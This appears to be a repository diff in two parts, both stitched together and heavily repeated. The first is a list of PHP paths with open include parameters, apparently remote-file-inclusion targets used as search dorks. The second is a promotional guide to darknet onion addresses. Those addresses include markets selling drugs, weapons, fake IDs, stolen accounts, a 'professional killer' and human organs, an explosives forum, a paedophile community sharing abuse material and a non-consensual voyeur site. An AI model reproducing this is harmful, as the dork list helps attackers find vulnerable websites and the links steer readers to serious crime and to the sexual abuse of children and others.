+index1.php?pg=
+print.php?in=
+general.php?modo=
+head.php?ki=
+press.php?my=
+index1.php?pollname=
+principal.php?to=
+default.php?play=
+page.php?g=
+nota.php?pg=
+blank.php?destino=
+blank.php?z=
+components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
+module_db.php?pivot_path= module_db.php?pivot_path=
+/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=
+components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
+com_extended_registration
+smarty_config.php?root_dir= smarty
+include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
+send_reminders.php?includedir= send_reminders.php?includedir=
+components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
+inc/functions.inc.php?config[ppa_root_path]= Index Albums index.php
+/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg
+[Script Path]/admin/index.php?o= admin/index.php;
+/admin/index.php?o= admin/index.php;
+/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
+/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
+admin/doeditconfig.php?thispath=../includes&config[path]= admin
+/components/com_simpleboard/image_upload.php?sbp= com_simpleboard
+components/com_simpleboard/image_upload.php?sbp= com_simpleboard
+/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
+mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
+zentrack/index.php?configFile=
+inst/index.php?lng=../../include/main.inc&G_PATH=
+pivot/modules/module_db.php?pivot_path=
+include/write.php?dir=
+includes/header.php?systempath=
+becommunity/community/index.php?pageurl=
+agendax/addevent.inc.php?agendax_path=
+myPHPCalendar/admin.php?cal_dir=
+yabbse/Sources/Packages.php?sourcedir=
+zboard/zboard.php
+path_of_cpcommerce/_functions.php?prefixpage.php?pa=
+default.php?menue=
+main.php?goto=
+index1.php?abre=
+info.php?seccion=
+index2.php?pa=
+layout.php?pageweb=
+nota.php?disp=
+index1.php?bOdy=
+default.php?nivel=
+show.php?header=
+down*.php?pag=
+start.php?tipo=
+standard.php?w=
+index.php?open=
+blank.php?menu=
+general.php?nivel=
+padrao.php?nivel=
+*inc*.php?addr=
+index.php?var=
+home.php?redirect=
+*inc*.php?link=
+*inc*.php?incl=
+padrao.php?corpo=
+down*.php?url=
+enter.php?goto=
+down*.php?addr=
+sub*.php?j=
+principal.php?f=
+sub*.php?menue=
+index2.php?section=
+general.php?my=
+head.php?loader=
+general.php?goto=
+include.php?dir=
+start.php?header=
+blank.php?in=
+base.php?name=
+nota.php?goFile=
+head.php?base_dir=
+mod*.php?recipe=
+press.php?pr=
+padrao.php?*[*]*=
+layout.php?opcion=
+print.php?rub=
+index.php?pr=
+general.php?seite=
+pagina.php?numero=
+*inc*.php?pg=
+nota.php?rub=
+view.php?seite=
+pagina.php?recipe=
+index.php?pref=
+page.php?action=
+page.php?ev=
+show.php?ir=
+head.php?index=
+mod*.php?pname=
+view.php?ir=
+*inc*.php?start=
+principal.php?rub=
+principal.php?corpo=
+padrao.php?middle=
+base.php?pname=
+template.php?header=
+view.php?sp=
+main.php?name=
+nota.php?m=
+blank.php?open=
+head.php?dir=
+page.php?pname=
+*inc*.php?k=
+index.php?pollname=
+head.php?oldal=
+index1.php?str=
+template.php?choix=
+down*.php?pollname=
+page.php?recipe=
+template.php?corpo=
+nota.php?sec=
+info.php?*[*]*=
+sub*.php?*[*]*=
+page.php?q=
+index1.php?type=
+gery.php?y=
+standard.php?lang=
+gery.php?page=
+index.php?action=
+press.php?pname=
+down*.php?v=
+index3.php?second=
+show.php?recipe=
+main.php?pre=
+file.php?numero=
+print.php?str=
+standard.php?link=
+nota.php?OpenPage=
+view.php?pollname=
+print.php?l=
+index.php?go=
+standard.php?numero=
+view.php?pr=
+down*.php?read=
+down*.php?action=
+index1.php?OpenPage=
+principal.php?left=
+mod*.php?start=
+file.php?bOdy=
+gery.php?pg=
+blank.php?qry=
+base.php?eval=
+default.php?left=
+gery.php?param=
+blank.php?pa=
+nota.php?b=
+path.php?loader=
+start.php?o=
+include.php?include=
+nota.php?corpo=
+enter.php?second=
+sub*.php?pname=
+mod*.php?pageweb=
+principal.php?addr=
+standard.php?action=
+template.php?lang=
+include.php?basepath=
+sub*.php?ir=
+down*.php?nivel=
+path.php?opcion=
+print.php?category=
+print.php?menu=
+layout.php?secao=
+template.php?param=
+standard.php?ref=
+base.php?include=
+blank.php?bOdy=
+path.php?pref=
+print.php?g=
+padrao.php?subject=
+nota.php?modo=
+index3.php?loader=
+template.php?seite=
+general.php?pageweb=
+index2.php?param=
+path.php?nivel=
+page.php?pref=
+press.php?pref=
+enter.php?ev=
+standard.php?middle=
+index2.php?recipe=
+blank.php?dir=
+home.php?pageweb=
+view.php?panel=
+down*.php?home=
+head.php?ir=
+mod*.php?ir=
+show.php?pagina=
+default.php?base_dir=
+show.php?loader=
+path.php?mid=
+blank.php?abre=
+down*.php?choix=
+info.php?opcion=
+page.php?loader=
+principal.php?oldal=
+index1.php?load=
+home.php?content=
+pagina.php?sekce=
+file.php?n=
+include.php?redirect=
+print.php?itemnav=
+enter.php?index=
+print.php?middle=
+sitio.php?goFile=
+head.php?include=
+enter.php?e=
+index.php?play=
+enter.php?id=
+view.php?mod=
+show.php?nivel=
+file.php?channel=
+layout.php?choix=
+info.php?bOdy=
+include.php?go=
+index3.php?nivel=
+sub*.php?include=
+path.php?numero=
+principal.php?header=
+main.php?opcion=
+enter.php?s=
+sub*.php?pre=
+include.php?index=
+gery.php?pageweb=
+padrao.php?path=
+info.php?url=
+press.php?ev=
+index1.php?pg=
+print.php?in=
+general.php?modo=
+head.php?ki=
+press.php?my=
+index1.php?pollname=
+principal.php?to=
+default.php?play=
+page.php?g=
+nota.php?pg=
+blank.php?destino=
+blank.php?z=
+components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
+module_db.php?pivot_path= module_db.php?pivot_path=
+/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=
+components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
+com_extended_registration
+smarty_config.php?root_dir= smarty
+include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
+send_reminders.php?includedir= send_reminders.php?includedir=
+components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
+inc/functions.inc.php?config[ppa_root_path]= Index Albums index.php
+/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg
+[Script Path]/admin/index.php?o= admin/index.php;
+/admin/index.php?o= admin/index.php;
+/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
+/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
+admin/doeditconfig.php?thispath=../includes&config[path]= admin
+/components/com_simpleboard/image_upload.php?sbp= com_simpleboard
+components/com_simpleboard/image_upload.php?sbp= com_simpleboard
+/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
+mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
+zentrack/index.php?configFile=
+inst/index.php?lng=../../include/main.inc&G_PATH=
+pivot/modules/module_db.php?pivot_path=
+include/write.php?dir=
+includes/header.php?systempath=
+becommunity/community/index.php?pageurl=
+agendax/addevent.inc.php?agendax_path=
+myPHPCalendar/admin.php?cal_dir=
+yabbse/Sources/Packages.php?sourcedir=
+zboard/zboard.php
+path_of_cpcommerce/_functions.php?prefixpage.php?pa=
+default.php?menue=
+main.php?goto=
+index1.php?abre=
+info.php?seccion=
+index2.php?pa=
+layout.php?pageweb=
+nota.php?disp=
+index1.php?bOdy=
+default.php?nivel=
+show.php?header=
+down*.php?pag=
+start.php?tipo=
+standard.php?w=
+index.php?open=
+blank.php?menu=
+general.php?nivel=
+padrao.php?nivel=
+*inc*.php?addr=
+index.php?var=
+home.php?redirect=
+*inc*.php?link=
+*inc*.php?incl=
+padrao.php?corpo=
+down*.php?url=
+enter.php?goto=
+down*.php?addr=
+sub*.php?j=
+principal.php?f=
+sub*.php?menue=
+index2.php?section=
+general.php?my=
+head.php?loader=
+general.php?goto=
+include.php?dir=
+start.php?header=
+blank.php?in=
+base.php?name=
+nota.php?goFile=
+head.php?base_dir=
+mod*.php?recipe=
+press.php?pr=
+padrao.php?*[*]*=
+layout.php?opcion=
+print.php?rub=
+index.php?pr=
+general.php?seite=
+pagina.php?numero=
+*inc*.php?pg=
+nota.php?rub=
+view.php?seite=
+pagina.php?recipe=
+index.php?pref=
+page.php?action=
+page.php?ev=
+show.php?ir=
+head.php?index=
+mod*.php?pname=
+view.php?ir=
+*inc*.php?start=
+principal.php?rub=
+principal.php?corpo=
+padrao.php?middle=
+base.php?pname=
+template.php?header=
+view.php?sp=
+main.php?name=
+nota.php?m=
+blank.php?open=
+head.php?dir=
+page.php?pname=
+*inc*.php?k=
+index.php?pollname=
+head.php?oldal=
+index1.php?str=
+template.php?choix=
+down*.php?pollname=
+page.php?recipe=
+template.php?corpo=
+nota.php?sec=
+info.php?*[*]*=
+sub*.php?*[*]*=
+page.php?q=
+index1.php?type=
+gery.php?y=
+standard.php?lang=
+gery.php?page=
+index.php?action=
+press.php?pname=
+down*.php?v=
+index3.php?second=
+show.php?recipe=
+main.php?pre=
+file.php?numero=
+print.php?str=
+standard.php?link=
+nota.php?OpenPage=
+view.php?pollname=
+print.php?l=
+index.php?go=
+standard.php?numero=
+view.php?pr=
+down*.php?read=
+down*.php?action=
+index1.php?OpenPage=
+principal.php?left=
+mod*.php?start=
+file.php?bOdy=
+gery.php?pg=
+blank.php?qry=
+base.php?eval=
+default.php?left=
+gery.php?param=
+blank.php?pa=
+nota.php?b=
+path.php?loader=
+start.php?o=
+include.php?include=
+nota.php?corpo=
+enter.php?second=
+sub*.php?pname=
+mod*.php?pageweb=
+principal.php?addr=
+standard.php?action=
+template.php?lang=
+include.php?basepath=
+sub*.php?ir=
+down*.php?nivel=
+path.php?opcion=
+print.php?category=
+print.php?menu=
+layout.php?secao=
+template.php?param=
+standard.php?ref=
+base.php?include=
+blank.php?bOdy=
+path.php?pref=
+print.php?g=
+padrao.php?subject=
+nota.php?modo=
+index3.php?loader=
+template.php?seite=
+general.php?pageweb=
+index2.php?param=
+path.php?nivel=
+page.php?pref=
+press.php?pref=
+enter.php?ev=
+standard.php?middle=
+index2.php?recipe=
+blank.php?dir=
+home.php?pageweb=
+view.php?panel=
+down*.php?home=
+head.php?ir=
+mod*.php?ir=
+show.php?pagina=
+default.php?base_dir=
+show.php?loader=
+path.php?mid=
+blank.php?abre=
+down*.php?choix=
+info.php?opcion=
+page.php?loader=
+principal.php?oldal=
+index1.php?load=
+home.php?content=
+pagina.php?sekce=
+file.php?n=
+include.php?redirect=
+print.php?itemnav=
+enter.php?index=
+print.php?middle=
+sitio.php?goFile=
+head.php?include=
+enter.php?e=
+index.php?play=
+enter.php?id=
+view.php?mod=
+show.php?nivel=
+file.php?channel=
+layout.php?choix=
+info.php?bOdy=
+include.php?go=
+index3.php?nivel=
+sub*.php?include=
+path.php?numero=
+principal.php?header=
+main.php?opcion=
+enter.php?s=
+sub*.php?pre=
+include.php?index=
+gery.php?pageweb=
+padrao.php?path=
+info.php?url=
+press.php?ev=
+index1.php?pg=
+print.php?in=
+general.php?modo=
+head.php?ki=
+press.php?my=
+index1.php?pollname=
+principal.php?to=
+default.php?play=
+page.php?g=
+nota.php?pg=
+blank.php?destino=
+blank.php?z=
+components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
+module_db.php?pivot_path= module_db.php?pivot_path=
+/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=
+components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
+com_extended_registration
+smarty_config.php?root_dir= smarty
+include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
+send_reminders.php?includedir= send_reminders.php?includedir=
+components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
+inc/functions.inc.php?config[ppa_root_path]= Index Albums index.php
+/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg
+[Script Path]/admin/index.php?o= admin/index.php;
+/admin/index.php?o= admin/index.php;
+/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
+/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
+admin/doeditconfig.php?thispath=../includes&config[path]= admin
+/components/com_simpleboard/image_upload.php?sbp= com_simpleboard
+components/com_simpleboard/image_upload.php?sbp= com_simpleboard
+/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
+mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
+zentrack/index.php?configFile=
+inst/index.php?lng=../../include/main.inc&G_PATH=
+pivot/modules/module_db.php?pivot_path=
+include/write.php?dir=
+includes/header.php?systempath=
+becommunity/community/index.php?pageurl=
+agendax/addevent.inc.php?agendax_path=
+myPHPCalendar/admin.php?cal_dir=
+yabbse/Sources/Packages.php?sourcedir=
+zboard/zboard.php
+path_of_cpcommerce/_functions.php?prefixpage.php?pa=
+default.php?menue=
+main.php?goto=
+index1.php?abre=
+info.php?seccion=
+index2.php?pa=
+layout.php?pageweb=
+nota.php?disp=
+index1.php?bOdy=
+default.php?nivel=
+show.php?header=
+down*.php?pag=
+start.php?tipo=
+standard.php?w=
+index.php?open=
+blank.php?menu=
+general.php?nivel=
+padrao.php?nivel=
+*inc*.php?addr=
+index.php?var=
+home.php?redirect=
+*inc*.php?link=
+*inc*.php?incl=
+padrao.php?corpo=
+down*.php?url=
+enter.php?goto=
+down*.php?addr=
+sub*.php?j=
+principal.php?f=
+sub*.php?menue=
+index2.php?section=
+general.php?my=
+head.php?loader=
+general.php?goto=
+include.php?dir=
+start.php?header=
+blank.php?in=
+base.php?name=
+nota.php?goFile=
+head.php?base_dir=
+mod*.php?recipe=
+press.php?pr=
+padrao.php?*[*]*=
+layout.php?opcion=
+print.php?rub=
+index.php?pr=
+general.php?seite=
+pagina.php?numero=
+*inc*.php?pg=
+nota.php?rub=
+view.php?seite=
+pagina.php?recipe=
+index.php?pref=
+page.php?action=
+page.php?ev=
+show.php?ir=
+head.php?index=
+mod*.php?pname=
+view.php?ir=
+*inc*.php?start=
+principal.php?rub=
+principal.php?corpo=
+padrao.php?middle=
+base.php?pname=
+template.php?header=
+view.php?sp=
+main.php?name=
+nota.php?m=
+blank.php?open=
+head.php?dir=
+page.php?pname=
+*inc*.php?k=
+index.php?pollname=
+head.php?oldal=
+index1.php?str=
+template.php?choix=
+down*.php?pollname=
+page.php?recipe=
+template.php?corpo=
+nota.php?sec=
+info.php?*[*]*=
+sub*.php?*[*]*=
+page.php?q=
+index1.php?type=
+gery.php?y=
+standard.php?lang=
+gery.php?page=
+index.php?action=
+press.php?pname=
+down*.php?v=
+index3.php?second=
+show.php?recipe=
+main.php?pre=
+file.php?numero=
+print.php?str=
+standard.php?link=
+nota.php?OpenPage=
+view.php?pollname=
+print.php?l=
+index.php?go=
+standard.php?numero=
+view.php?pr=
+down*.php?read=
+down*.php?action=
+index1.php?OpenPage=
+principal.php?left=
+mod*.php?start=
+file.php?bOdy=
+gery.php?pg=
+blank.php?qry=
+base.php?eval=
+default.php?left=
+gery.php?param=
+blank.php?pa=
+nota.php?b=
+path.php?loader=
+start.php?o=
+include.php?include=
+nota.php?corpo=
+enter.php?second=
+sub*.php?pname=
+mod*.php?pageweb=
+principal.php?addr=
+standard.php?action=
+template.php?lang=
+include.php?basepath=
+sub*.php?ir=
+down*.php?nivel=
+path.php?opcion=
+print.php?category=
+print.php?menu=
+layout.php?secao=
+template.php?param=
+standard.php?ref=
+base.php?include=
+blank.php?bOdy=
+path.php?pref=
+print.php?g=
+padrao.php?subject=
+nota.php?modo=
+index3.php?loader=
+template.php?seite=
+general.php?pageweb=
+index2.php?param=
+path.php?nivel=
+page.php?pref=
+press.php?pref=
+enter.php?ev=
+standard.php?middle=
+index2.php?recipe=
+blank.php?dir=
+home.php?pageweb=
+view.php?panel=
+down*.php?home=
+head.php?ir=
+mod*.php?ir=
+show.php?pagina=
+default.php?base_dir=
+show.php?loader=
+path.php?mid=
+blank.php?abre=
+down*.php?choix=
+info.php?opcion=
+page.php?loader=
+principal.php?oldal=
+index1.php?load=
+home.php?content=
+pagina.php?sekce=
+file.php?n=
+include.php?redirect=
+print.php?itemnav=
+enter.php?index=
+print.php?middle=
+sitio.php?goFile=
+head.php?include=
+enter.php?e=
+index.php?play=
+enter.php?id=
+view.php?mod=
+show.php?nivel=
+file.php?channel=
+layout.php?choix=
+info.php?bOdy=
+include.php?go=
+index3.php?nivel=
+sub*.php?include=
+path.php?numero=
+principal.php?header=
+main.php?opcion=
+enter.php?s=
+sub*.php?pre=
+include.php?index=
+gery.php?pageweb=
+padrao.php?path=
+info.php?url=
+press.php?ev=
+index1.php?pg=
+print.php?in=
+general.php?modo=
+head.php?ki=
+press.php?my=
+index1.php?pollname=
+principal.php?to=
+default.php?play=
+page.php?g=
+nota.php?pg=
+blank.php?destino=
+blank.php?z=
+components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
+module_db.php?pivot_path= module_db.php?pivot_path=
+/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=
+components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
+com_extended_registration
+smarty_config.php?root_dir= smarty
+include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
+send_reminders.php?includedir= send_reminders.php?includedir=
+components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
+inc/functions.inc.php?config[ppa_root_path]= Index Albums index.php
+/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg
+[Script Path]/admin/index.php?o= admin/index.php;
+/admin/index.php?o= admin/index.php;
+/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
+/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
+admin/doeditconfig.php?thispath=../includes&config[path]= admin
+/components/com_simpleboard/image_upload.php?sbp= com_simpleboard
+components/com_simpleboard/image_upload.php?sbp= com_simpleboard
+/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
+mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
+zentrack/index.php?configFile=
+inst/index.php?lng=../../include/main.inc&G_PATH=
+pivot/modules/module_db.php?pivot_path=
+include/write.php?dir=
+includes/header.php?systempath=
+becommunity/community/index.php?pageurl=
+agendax/addevent.inc.php?agendax_path=
+myPHPCalendar/admin.php?cal_dir=
+yabbse/Sources/Packages.php?sourcedir=
+zboard/zboard.php
+path_of_cpcommerce/_functions.php?prefix
diff --git a/2017-2018DEEPWEBLINKS2_txt.md b/2017-2018DEEPWEBLINKS2_txt.md
new file mode 100644
index 0000000..2737b8e
--- /dev/null
+++ b/2017-2018DEEPWEBLINKS2_txt.md
@@ -0,0 +1,1314 @@
+# 2017-2018DEEPWEBLINKS2
+
+
+---
+
+Web Search Engine) Links
+
+Hidden Wiki Links Now you are here then you already know about deep web links / The Hidden Wiki / Dark web links. But before sharing large amount of .onion directory I want to share some very good deep web links which always help you, because all these are deep web search engine links by the help of these search engine you can find any latest working deep web marketplace, hidden wiki or deep web sites list.
+Dark Web Marketplace
+
+Darknet markets is a solution for all type products because these type marketplace gives security to both party means seller or buyer, here you can use escrow service which make your payment mode more secure and clear. These type darknet markets places having some big number of listed categories and each category having more than thousands of unique products.
+
+So simple, Today If you are planning to buy anything on deep web/the hidden wiki then these markets can provide you all type products buying or selling opportunity and here you also can get more than one alternatives into single category.
+
+Mostly these deep web links having Drugs, Weapon, Digital products, Fraud, Services, Guide and Tutorials categories.
+
+Bellow I am giving you some very popular deep web Links (dark web links), which you can try but before using these hidden wiki links, you need to register yourself on these darknet markets deep web link.
+
+Note: If you are seller then these dark web marketplace links will proving milestone for you. where you can sell your products. and you can easily get targeted users or can achieve your goals within very short time span.
+
+Note: I am not recommending you to visit these deep web sites (dark web links), I only added these deep web sites/onion sites here for education purpose or freedom information. If you visit these deep web sites then this is total on your risk, but I am recommending you here before visiting these deep web sites make sure focus on your privacy Security.
+
+Recommended: For better security use NordVPN Onion Over Server + Tor Browser. ( Always run both software before access hidden Internet).
+
+http://pwoah7foa6au2pul.onion Marketplace Alphabay is most popular and trusted deep web market. If you are truly looking something trusted on deep web then Alphabay is one of the best market, And this marketplace also has all major categories items like as fraud, drugs, chemicals, Guide & Tutorials, Digital Products, Services, and much more. According to current status, This marketplace has more than 3 Lakh listed items, and Just now support two type crypto currency which is Monero and Bitcoins.
+
+Note: Before Buy any product here always check seller profile and available feedback and reviews.
+
+http://lchudifyeqm4ldjj.onion/ Marketplace Dream Market : Second largest and most trusted dark web market, also you can say alternative of alphaby market, This marketplace place have drugs and digital products, and both these category have more than 75000+ listed items which is huge. If you are looking another great platform then dream market can provide you right items.
+
+http://wallstyizjhkrvmj.onion/ Marketplace WallStreet Market Another deep web markets which have more than 500+ listed items and each item are well categorized. According to category, You can get products related to drugs, counterfeits, jewelry & gold, services, Software & malware, security & hosting and much more.. and listing growing day to day. Marketplace support PGP and data encrypt by strong algorithm and also support German language. WallStreet has scam free status and multisig support.
+
+http://udujmgcoqw6o4cp4.onion Deep Web Market UnderGround, one of the best and reliable deep web market with the possibility to pay in two times. Markets have more than thousands listed items and items related to Prepaid cards, PayPal account, Diploma, Passport, ID Cards, Driver License, Phone, Computer, Tablets, Game Console, Hacker, Weapons, Professional Killer, Humen Organs, Medicines and so on.
+
+Note: This deep web links support JavaScript, If you want to access all function then you need to disable your javascript. But for security reasons, this is not good choice.
+
+http://valhallaxmn3fydu.onion Marketplace Valhalla: This deep web marketplace is also very popular into deep web world and mostly people prefer this hidden wiki marketplace url for buying drugs, gadgets, hire services and lot many more things.
+
+http://hansamkt2rr6nfg3.onion/ Marketplace Hansa is another famous deep web marketplace, which having more than 15K+ listed products. which is huge, and here you can buy all type products related to drugs, weapons, services, tutorials, services, electronics. It is one of most popular the dark web links.
+
+http://zocaloczzecchoaa.onion Marketplace Zocalo Marketplace: Same as other marketplaces this .onion directory links also having good amount of listing product.
+
+http://acropol4ti6ytzeh.onion Marketplace Acropolis forum also a good darknet markets, and community forum for sell and buy anything which you want, and also can find your questions answer in this dark web link.
+
+http://tochka3evlj3sxdv.onion Marketplace Tochka Free Market: Tochka is also good darknet market where you can find mostly all type product related to education, hacking, drugs, weapon, services and software.
+
+http://cryptomktgxdn2zd.onion Marketplace Crypto Market: Are you looking some other deep web links marketplace alternative then check out Crypto Market, Here you can participate in crypto market forum.
+
+Warning: Before browsing the Deep web links/the dark web links, always run your NordVPN Onion Over VPN Server with Tor Browser. Since Tor Browser doesnt provide your complete anonymity and privacy. You are completely safe only if you use NordVPN software.
+
+http://kbhpodhnfxl3clb4.onion/ not Evil (Tor Search Engine) for finding list of deep web sites, and one can easily find relevant information about the deep web/the hidden wiki which s/he want to get..
+
+http://hss3uro2hsxfogfq.onion/ not Evil search engine direct visit deep web links.
+
+Note: Now Tor search engine has been moved on new name, now this popular search engine also known as not Evil, in the current date not Evil having more than 12477146 .onion links database.
+Grams Search Engine and Associated Deep Web Services Links:
+
+Grams is newly launched deep web search engine, this search engine getting good amount of popularity with in very short time and these days thousands of people use Grams for deep web access. You can access Grams by using below dark web link.
+
+http://grams7enufi7jmdl.onion/ Grams Search Darknet Markets and more.
+
+Grams is not a single platform, but its like a Google, After couple month after grams launching date, Grams introduced some other product like Helix, Helix Light, Infodesk or Flow.
+
+All three having unique features. If you want to access these three Grams sub product, then you can access by the help of Grams deep web link, or you can also go by the help of bellow given direct dark web links.
+
+Note: Helix takes charge 2.5% every transaction.
+
+Helix Tor Directory Link: http://grams7enufi7jmdl.onion/helix/light
+
+InfoDesk: If you want to find any Vender, products or any specific marketplace tor link then this place can help you because here you can find some great marketplace which is trusted, and mostly people use in daily life.You can access InfoDesk using below deep web link.
+
+InfoDesk Hidden Wiki Link: http://grams7enufi7jmdl.onion/infodesk
+
+Flow: Now time for Flow, this is another popular deep web product which is also introduced by Grams, Hope you like Flow features because some person like this platform for Flow redirect feature.
+
+According to this, if you want to access any darknet markets and you didnt remember tor directory link then you can access these type hidden wiki url or deep web links easily.. GramsFlow makes this type complicated process more easy.
+
+Now you only need to remember your marketplace name like Agora, Wiki, OutLaw, nuke or any other and you can access by help of Flow.
+
+For Example: if you want to access the hidden wiki then you need to type in your Tor Browser gramsflow.com/wiki, then holla your link redirect on actual tor hidden directory.
+
+For using awesome feature of Flow, visit below give deep web link.
+
+Flow Tor Hidden Directory Link: http://grams7enufi7jmdl.onion/infodesk
+
+http://skunkrdunsylcfqd.onion/sites.html The Intel Wiki This .onion site has the good number of trusted deep web links, which every day visited by most of the deep web users. But sometimes when I try to access this deep web link and I saw this dark web link is down. One more thing the Intel wiki also a forum which having great number of threads, which having useful information about the deep web and trusted deep web links/dark web links.
+
+http://auutwvpt25zfyncd.onion/ Tor Links Directory OnionDir having more than 1200+ listed dark web sites, one better thing is here you can see on top how many dark net sites are live and how many deep web sites not and All .onions links are well categorized according to categories. For Example: If you are looking hacking or drugs related marketplace deep web links then you need to click on required category and visit any deep web sites which you like.
+
+Forums & Community Deep Web Links(For Questions and Answers Conversation)
+
+If you are eager to learn the darknet hidden wiki forum, also want to deep discuss on this sensitive topic and looking best deep web forums and the hidden wiki links and if you also looking how to access the deep web latest news and updates.
+
+Deepwebsiteslinks is a best source where you can find all most popular deep web links, the hidden wiki news and darknet markets updates day to day and people visit here every day and participate into available threads.
+
+Here I am giving you some popular deep web forums and darknet community links/deep web links, which are sharing the deep web/the hidden wiki related news and current updates everyday.
+
+Privacy Tips: Always use NordVPN Onion Over Server with Tor browser while you accessing deep web sites. if you are thinking you are using TOR and you are safe. Let me clear for your privacy security. TOR doesnt provide you full security. To access deep web with best anonymity and privacy, NordVPN and TOR both are must used software.
+
+http://rrcc5xgpiuf3xe6p.onion/ Forum/Community IntelExchange is my favorite the dark web community because here you can find information thread and also can ask your question, I like this because here you can find mostly pre-discussed thread which having lot of meaningful information like best dark web search engines, dark web browser, most trusted the hidden wiki url.
+
+http://parazite.nn.fi/roguesci/ Forum The Explosive and Weapon Forum, This hidden wiki link has some very good weapons and Explosive-related Documents and treads.
+
+http://zw3crggtadila2sg.onion/imageboard/ Forum TorChan is darknet forum where you ask and participates into running chat thread, but If you are first time visitors then you dont know how to visit this website then simple type given URL and after press enter you will get one popup on screen then you need to put given Username and Password into both field, ByDefault Username or Password is torchan2, torchan2. this is most popular the hidden wiki forum, where every day more than thousands or visitors visit and share something very interesting.
+
+http://kpdqsslspgfwfjpw.onion/ Forum/Community A Chan, I think this deep web links having Russian language stuff, I cant tell you about properly this site, and what type stuff this deep web sites have.
+
+http://rhe4faeuhjs4ldc5.onion/ Forum/Community Do you have any query related to white hate hacking or black hat techniques, and you want to know some secret hacking tips then this hidden wiki community will proving helpful stuff and gernals. having more than 20+ active threads.
+
+http://turkiyex6fkt46ra.onion/forum/ Forum/Community/Non-English Are you from Turkey, and looking your region related deep web forum then check out this hidden wiki forum link.
+
+http://anonywebix6vi6gz.onion/ Forum/Community This is newly launched dark net forum. This hidden wiki link also will proving helpful for you, if you want to discuss about the deepweb, darknet markets or any others.
+
+http://arcadian4nxs3pjr.onion/ Forum/Community ArcadiaNode is a dark net forum, Note: this deep web sites is not in the English language, thats why I dont have more idea about this forum.
+
+http://5dhf54nxiuuv6jvs.onion/ Forum/Community AXAHis Community: This is another deepweb (hidden wiki) community where you can share your questions and knowledge, also can interact with related people.
+
+Note: For access first time need registration.
+
+http://p22i3mcdceionj36.onion/index.php Forum/Community XenForo: This deep web marketplace is a forum, but here you can buy Pfizer and GG249 Xanax products.
+
+http://anonymzn3twqpxq5.onion/ Forum/Community Do you love DBA task and want to discuss on DBA related topics then check out this forum, hope this will proving helpful for you.
+
+http://z2hjm7uhwisw5jm5.onion/ Forum/Community WallStreet: If you having any query about Tor or Looking some hidden web related answer then you can try on this deep web link.
+
+http://support26v5pvkg6.onion/ Forum/Community Pedo Support Community: This Deep web forum is having more than 10K+ threads, like links, personal support, pedo literature, child love support, etc.
+
+http://suprbayoubiexnmp.onion/ Forum/Community SuperBay: This community is having very good amount of thread and everyday lots of visitors use these threads, If you have some problem, then you can find relevant thread, and can resolve your problem.
+
+https://blue.thevendingmachine.pw/index.php Community/Forum TheVendingMachine: This is very popular deep web community, every day more than 1000+ visitors visit this onion site, and share information. Here most popular thread is Torrent, Movies, General Discussion, TV shows, documentaries, etc.
+
+http://npdaaf3s3f2xrmlo.onion/ Tor Community TwitterClon is just like twitter sites here you can share everything which you want into form of tweet, hope you also enjoy this sites, but mostly time I saw this site down.
+NordVPN 2
+
+http://ji7nj2et2kyrxpsh.onion/ Forum Dark Web Forum: I dont know what you can find here because this is non-english forum but as per my guess, hope you can discuss about dark web and also can participate into active threads.
+
+http://krainkasnuawwxmu.onion/ Forum Dark Web Community: This is the next Russian forum, where you can discuss about dark web community. If you have any question and want to know the right answers, then you can sign up on this forum and can find some easy solutions.
+
+http://fbcy5ylyoeqzqzcr.onion/ Forum Moneybook: Another dark web forum where you can discuss about all popular topics related to dark web like as onion links, dark web markets review, PayPal accounts, music movie sites and much more, hope here you can find some good thread for you.
+
+http://realpissxny3hgyl.onion/ Forum/Porn RealPiss Voyeur Community real uncensored female pee spycams: community for real girl piss videos and pictures, If you interested into such type content then you can try to visit realpiss site.
+
